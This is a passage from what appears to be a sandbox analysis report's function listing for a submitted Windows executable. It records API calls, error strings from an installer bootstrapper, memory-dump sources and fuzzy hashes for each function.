Instruction Fuzzy Hash: 3F018B35A46216A7EB305E9D9C09E7B7BDCFF51BA0B110927F844AB340D6A4CE009692

Function 005D68B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 005D690F

Part of subcall function 005D8713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 005D8820
Part of subcall function 005D8713: GetLastError.KERNEL32 ref: 005D882A

Strings

clbcatq.dll, xrefs: 005D68DC
atomutil.cpp, xrefs: 005D68FD
`Dv, xrefs: 005D690F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Time$ErrorFileFreeLastStringSystem
String ID: `Dv$atomutil.cpp$clbcatq.dll
API String ID: 211557998-305513856
Opcode ID: 3647c3041b742b0d92fcacbf19231e19f06337a16fba22bcf9a903eeadfb4c4e
Instruction ID: b15fdc314b3c0012ed39c79b8b8bc0b2b205ee6833c3ea6170a33dc88398fb94
Opcode Fuzzy Hash: 3647c3041b742b0d92fcacbf19231e19f06337a16fba22bcf9a903eeadfb4c4e
Instruction Fuzzy Hash: 13018BB190222AFB8F309F8DC84586AFFA8FB14364B60417BF504A7211C3329E11E7D0

Function 005AECC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 005AECED
GetLastError.KERNEL32 ref: 005AECF7

Strings

userForApplication.cpp, xrefs: 005AED1B
Failed to post elevate message., xrefs: 005AED25

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post elevate message.
API String ID: 2609174426-4098423239
Opcode ID: 928b1ada9acb7b20bb3906a78945328dcf986b8e4f3425a6a7ce0e91e1aa14ad
Instruction ID: 1a36802eea76e0ced899013fdaf7bf6c1fb6a4a25ee73d78ba0b3fb63e407ff9
Opcode Fuzzy Hash: 928b1ada9acb7b20bb3906a78945328dcf986b8e4f3425a6a7ce0e91e1aa14ad
Instruction Fuzzy Hash: 98F0F633A41232ABCB305A999C0EA4A7F84BF05B70B21462AFE64AF2C1D725DC0193D0

Function 0059D8DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0059D903
FreeLibrary.KERNEL32(?,?,005948D7,00000000,?,?,0059548E,?,?), ref: 0059D912
GetLastError.KERNEL32(?,005948D7,00000000,?,?,0059548E,?,?), ref: 0059D91C

Strings

BootstrapperApplicationDestroy, xrefs: 0059D8FB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: BootstrapperApplicationDestroy
API String ID: 1144718084-3186005537
Opcode ID: 1021b4f3c69974247512d67029838db9ac2dcc46b0eec0ac2d3731c8ae618512
Instruction ID: c5045bf8e4607c1fff00dc780c832dddbb58d2f6126d280a75218d45a007a983
Opcode Fuzzy Hash: 1021b4f3c69974247512d67029838db9ac2dcc46b0eec0ac2d3731c8ae618512
Instruction Fuzzy Hash: C3F09C32701726ABD7245F6AD808B16FBB4FF15B62701822AFC15D6521D771EC50DBE0

Function 005D3D80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36comCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,fTY,?,00000000,00595466,?,?,?), ref: 005D3DA7
CoCreateInstance.OLE32(00000000,00000000,00000001,005F716C,?), ref: 005D3DBF

Strings

Microsoft.Update.AutoUpdate, xrefs: 005D3DA2
fTY, xrefs: 005D3D97, 005D3D9E, 005D3DA1

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID: Microsoft.Update.AutoUpdate$fTY
API String ID: 2151042543-668175093
Opcode ID: 23af6feba3cc8b570ca3c98ebd7228983ea4ff896d43ee30eee2a1a7645095e2
Instruction ID: 1a2427aef52bb4c8bc56d765241293c46df61f444de681e131aa9d39185ee23a
Opcode Fuzzy Hash: 23af6feba3cc8b570ca3c98ebd7228983ea4ff896d43ee30eee2a1a7645095e2
Instruction Fuzzy Hash: 34F0547160110CBFE710EFA9DD05AFFBBBDEB49710F410466EA01E7150DA71AE08D6A2

Function 005D31EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 005D3200
SysFreeString.OLEAUT32(00000000), ref: 005D3230

Strings

xmlutil.cpp, xrefs: 005D3214
`Dv, xrefs: 005D3230

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$AllocFree
String ID: `Dv$xmlutil.cpp
API String ID: 344208780-2876128059
Opcode ID: c73cfe1873cac526b59759cab18cea4983e04650779d58e0a3163c9d57390ae6
Instruction ID: b055e4ad18ef989f4b2a31c5339d3473e3a1baa2c5419b6b2910dca132ce9ba4
Opcode Fuzzy Hash: c73cfe1873cac526b59759cab18cea4983e04650779d58e0a3163c9d57390ae6
Instruction Fuzzy Hash: FBF0BE39902654E7C7311F889C08F6BBFA9BB90BA0F25452BFC046B310C7748E10A6E2

Function 005D3498 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 005D34AD
SysFreeString.OLEAUT32(00000000), ref: 005D34DD

Strings

xmlutil.cpp, xrefs: 005D34C4
`Dv, xrefs: 005D34DD

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$AllocFree
String ID: `Dv$xmlutil.cpp
API String ID: 344208780-2876128059
Opcode ID: 8355d49a6bfd6b4465b3623360dfb44206cdc47dd7da99bae3aa8469f7c213bb
Instruction ID: 406f9e9c6d7a347df8d5876a42470afc7d953079d11dab8a83f64c9fbfbf261e
Opcode Fuzzy Hash: 8355d49a6bfd6b4465b3623360dfb44206cdc47dd7da99bae3aa8469f7c213bb
Instruction Fuzzy Hash: FEF09031242215E7CF321A4CAC0CE5B7FA9BB81B60B114517FC1467310C779DA00A6E1

Function 005AF2D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 005AF2EE
GetLastError.KERNEL32 ref: 005AF2F8

Strings

userForApplication.cpp, xrefs: 005AF31C
Failed to post plan message., xrefs: 005AF326

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post plan message.
API String ID: 2609174426-2952114608
Opcode ID: 7c81f989d1e21efacfcb9565fd299f8ba1681de75a6669cda7ebcbadb48c0b35
Instruction ID: 79baa75ed115ab5600530f298c4211447b3ef1e8b93ccc5015f45c03135bf72e
Opcode Fuzzy Hash: 7c81f989d1e21efacfcb9565fd299f8ba1681de75a6669cda7ebcbadb48c0b35
Instruction Fuzzy Hash: 1AF0A733642235ABDF3166EA9C0DA4FBF84FF05BA0B024523FE54AB281D6609C0092D4

Function 005AF3E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 005AF3FC
GetLastError.KERNEL32 ref: 005AF406

Strings

userForApplication.cpp, xrefs: 005AF42A
Failed to post shutdown message., xrefs: 005AF434

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post shutdown message.
API String ID: 2609174426-188808143
Opcode ID: a9888322d5ac51c0b7583f87129575fc06436d1d0f1ef81b1b9b0102fc747718
Instruction ID: 699f0746662de0363071aa76ae783e6877d8d3292f0b2f40f798dcd70ecf459d
Opcode Fuzzy Hash: a9888322d5ac51c0b7583f87129575fc06436d1d0f1ef81b1b9b0102fc747718
Instruction Fuzzy Hash: 8EF0A737642635A7DF3116DA6C0DE4B7F94BF09B60B024026BE14BB292E6509C0097D4

Function 005B07B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(005DB478,00000000,?,005B1717,?,00000000,?,0059C287,?,00595405,?,005A75A5,?,?,00595405,?), ref: 005B07BF
GetLastError.KERNEL32(?,005B1717,?,00000000,?,0059C287,?,00595405,?,005A75A5,?,?,00595405,?,00595445,00000001), ref: 005B07C9

Strings

Failed to set begin operation event., xrefs: 005B07F7
cabextract.cpp, xrefs: 005B07ED

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: 2c41cc6b33b2eb8ae466b8a36490f0942d4ef11b8551ed20936ecd77f384ad4f
Instruction ID: 03b5e051ed0ff4389694477274ccfdbfec2b92cc402d147383a7e4d0f7b5878f
Opcode Fuzzy Hash: 2c41cc6b33b2eb8ae466b8a36490f0942d4ef11b8551ed20936ecd77f384ad4f
Instruction Fuzzy Hash: A2F0A737943631A7963412A55D09ACB7E88BE05BA0B120126FE41B7280EA14BD00D6D5

Function 005AEBCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 005AEBE0
GetLastError.KERNEL32 ref: 005AEBEA

Strings

Failed to post apply message., xrefs: 005AEC18
userForApplication.cpp, xrefs: 005AEC0E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post apply message.
API String ID: 2609174426-1304321051
Opcode ID: 33f46d9478c75679981b23bde82359e607a5e0d4ed78a0f0b1c4a67ba782ae02
Instruction ID: bdeddd307182125bcda2e3edee7142268fbb3d4b323a39917b9e4ab9301f51e5
Opcode Fuzzy Hash: 33f46d9478c75679981b23bde82359e607a5e0d4ed78a0f0b1c4a67ba782ae02
Instruction Fuzzy Hash: 02F0A733A42235B7EA31269A9C0EE4FBF84BF05BB0B024016FE18AB281D6609D0096D0

Function 005AEC5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 005AEC71
GetLastError.KERNEL32 ref: 005AEC7B

Strings

userForApplication.cpp, xrefs: 005AEC9F
Failed to post detect message., xrefs: 005AECA9

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: userForApplication.cpp$Failed to post detect message.
API String ID: 2609174426-598219917
Opcode ID: ed9982f8ef121ed2524ba140dfd453d309e7115a49bde011de39701b1208c310
Instruction ID: a136893264ec742f311d5bd4cbd4595160db11c8ce9666a421b3610a2ee67c63
Opcode Fuzzy Hash: ed9982f8ef121ed2524ba140dfd453d309e7115a49bde011de39701b1208c310
Instruction Fuzzy Hash: BBF0A733642235A7DB35569A9C0EF4BBF94BF05BB0F024012BD54AA281E6609C00D2D4

Function 005C6B76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 005C6C01
__alldvrm.LIBCMT ref: 005C6E02
__alldvrm.LIBCMT ref: 005C6E24

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction ID: 51329ce66b133fe6f18ef39aebbd0ab4a0a9117fe655f22f3cf38a8f325f0cf9
Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction Fuzzy Hash: ECA16A75A007869FDB21CFA8C881FAEBFE5FF55310F18416EE5859B282C6349E41C791

Function 005D5EC5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 005D5F92
lstrlenW.KERNEL32(00000000), ref: 005D5FAA

Strings

dlutil.cpp, xrefs: 005D6033

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: lstrlen
String ID: dlutil.cpp
API String ID: 1659193697-2067379296
Opcode ID: 527263cc1afaa6378a1663799d63798e5a9ffcc81aad0f0a061c469ae10e96a9
Instruction ID: f53c6247ee8348ffa41d7ab8fde642f70d36beed8fc28d67c57923b9c620f5f6
Opcode Fuzzy Hash: 527263cc1afaa6378a1663799d63798e5a9ffcc81aad0f0a061c469ae10e96a9
Instruction Fuzzy Hash: 0551B1B290161AEBDB219FA88C449AEBFB9FF88710F054027F904A7340D775DD41DBA0

Function 00594FA4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00000000,?,00595552,?,?,?,?,?,?), ref: 00594FFE
DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00595552,?,?,?,?,?,?), ref: 00595012
TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00595552,?,?), ref: 00595101
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00595552,?,?), ref: 00595108

Part of subcall function 00591161: LocalFree.KERNEL32(?,?,00594FBB,?,00000000,?,00595552,?,?,?,?,?,?), ref: 0059116B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalDeleteFreeSection$CloseHandleLocal
String ID:
API String ID: 3671900028-0
Opcode ID: f826d9394f2ce2427ecdfdd068fe2abe1fc291efd347fbe0d109b60c20b578f8
Instruction ID: e25eb9a1d79963c0c12eec46c5e31b50663cb280296066b0f1bbf733a0a2aefd
Opcode Fuzzy Hash: f826d9394f2ce2427ecdfdd068fe2abe1fc291efd347fbe0d109b60c20b578f8
Instruction Fuzzy Hash: 454196B1500B06ABDE31EBB4C84DB9B7BECBF44340F44492AB6AAD3151EB34E545CB64

Function 005D6067 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,005D5FD0,00000000,00000000,00000001), ref: 005D60DF
GetLastError.KERNEL32(?,?,005D5FD0,00000000,00000000,00000001), ref: 005D6130

Strings

dlutil.cpp, xrefs: 005D6103, 005D6154
8j_, xrefs: 005D60C3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast
String ID: 8j_$dlutil.cpp
API String ID: 1452528299-2642508291
Opcode ID: c33abef24e00e3b90dc6e039e33f94d9a1e8308f7332ee98fb038d990aa6b7ac
Instruction ID: 7b9160513e2dc07c9c3fe6a4aa423666fcae4c0b72634088a5e3d42f45594704
Opcode Fuzzy Hash: c33abef24e00e3b90dc6e039e33f94d9a1e8308f7332ee98fb038d990aa6b7ac
Instruction Fuzzy Hash: 5931273690122AF7DB328ADD8D08E6B7EB9BF40B50F020227FD00A7350D634CD01D2A1

Function 00594C86 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0059F96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00594CA5,?,?,00000001), ref: 0059F9BC

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00594D0C

Strings

Unable to get resume command line from the registry, xrefs: 00594CAB
Failed to get current process path., xrefs: 00594CCA
Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00594CF6

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Close$Handle
String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
API String ID: 187904097-642631345
Opcode ID: 1cfd3d12b2728698f26038432610299505a1622f7847ed684e678de313d8886f
Instruction ID: 7efad694d69ef3db6bb634108439d73aa2b64db489fb26479344d318cd3563a9
Opcode Fuzzy Hash: 1cfd3d12b2728698f26038432610299505a1622f7847ed684e678de313d8886f
Instruction Fuzzy Hash: 07113D75D01619FB9F22AB99D805CAEBFB9BF50710B1141A7F910A6310E7318E11EF80

Function 005C88B2 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005C8A56,00000000,00000000,?,005C8859,005C8A56,00000000,00000000,00000000,?,005C8A56,00000006,FlsSetValue), ref: 005C88E4
GetLastError.KERNEL32(?,005C8859,005C8A56,00000000,00000000,00000000,?,005C8A56,00000006,FlsSetValue,005F2404,005F240C,00000000,00000364,?,005C6230), ref: 005C88F0
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005C8859,005C8A56,00000000,00000000,00000000,?,005C8A56,00000006,FlsSetValue,005F2404,005F240C,00000000), ref: 005C88FE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 782fb912d2c198f4b7bf6fa7e0e395c08829143c588809c751effec5c1c336ed
Instruction ID: 5984eca939b5a262c7071e2bf9f4535353fe35fe613f1a483dbbef0f729eb79c
Opcode Fuzzy Hash: 782fb912d2c198f4b7bf6fa7e0e395c08829143c588809c751effec5c1c336ed
Instruction Fuzzy Hash: 1501B536642226EFDB214AA99C44F7B7B99BB15BA1B110929F905E3140DB30D804C7E0

Function 005C615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,005C1AEC,00000000,80004004,?,005C1DF0,00000000,80004004,00000000,00000000), ref: 005C6162
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 005C61CA
SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 005C61D6
_abort.LIBCMT ref: 005C61DC

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 2c16092f8e3c126ff3c9de57a3a9f338c75bc08397109ded64e747309b31b051
Instruction ID: 11385c08bc8816490ca80f9c07017981483f3d8c510ad95bdc5d78ec3dffaf4e
Opcode Fuzzy Hash: 2c16092f8e3c126ff3c9de57a3a9f338c75bc08397109ded64e747309b31b051
Instruction Fuzzy Hash: DCF0F936100A02AED22237E56C0DF2F1E5ABBC1772B2A011EF91892193FF649945D161

Function 00597435 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00597441
LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 005974A8

Strings

Failed to get value as numeric for variable: %ls, xrefs: 00597497
Failed to get value of variable: %ls, xrefs: 0059747B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

